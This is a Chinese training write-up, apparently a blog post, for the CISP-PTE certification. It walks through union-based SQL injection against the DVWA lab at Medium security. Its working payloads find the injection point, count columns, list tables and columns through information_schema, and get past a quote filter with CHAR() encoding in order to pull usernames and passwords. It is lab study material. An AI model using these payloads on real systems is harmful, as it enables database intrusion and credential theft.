CISP-PTE SQL注入 进阶篇之实战模拟

此次实战模拟的靶场为DVWA,将等级调为Medium

Medium

这是由POST传值传输数据
在这里插入图片描述
在这里插入图片描述

用Hackbar来传输POST,id=2,则数据更新,说明id是我们的注入点
在这里插入图片描述

判断类型

输入1 and 0#,无返回值,则是数字型
在这里插入图片描述

判断显示位

order by 1#输入到 order by 3#开始报错,则显示位只有2位
在这里插入图片描述

查看显示位

输入-1 union select 1,2#,看看1,2会出现在哪个位置

在这里插入图片描述

查表

输入-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
在这里插入图片描述
得到guestbook,users,world三张表

查字段名

输入-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
在这里插入图片描述
发现引号被过滤了,那我们将其char编码,在这里输入users,得到CHAR(117, 115, 101, 114, 115)
在这里插入图片描述

得到字段名:id,login,password,email,secret,activation_code,activated,reset_code,admin,user_id,first_name,last_name,user,password,avatar,last_login,failed_login,yinhangka,phone,shenfenzheng,id,username,password,level,id,username,card

查字段

这里取first_name,password查询
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

beirry

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值